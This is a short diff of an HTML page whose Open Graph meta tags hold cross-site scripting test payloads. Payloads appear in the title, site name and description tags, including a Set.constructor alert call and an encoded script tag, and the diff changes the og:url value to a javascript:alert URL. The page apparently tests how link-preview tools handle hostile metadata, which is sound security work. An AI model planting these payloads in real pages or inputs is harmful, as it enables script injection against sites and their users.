--- a/1111.html
+++ b/1111.html
@@ -7,7 +7,7 @@
 
 <meta property="og:title" content="\";alert('XSS');//">
 <meta property="og:site_name" content="Set.constructor`alert\x28document.domain\x29```">
-<meta property="og:url" content="https://hadariel.space/1111.html">
+<meta property="og:url" content="javascript:alert('XSS');">
 <meta property="og:description" content="¼script¾alert(¢XSS¢)¼/script¾">
 <meta property="og:type" content="website">
 <meta property="og:image" content="">
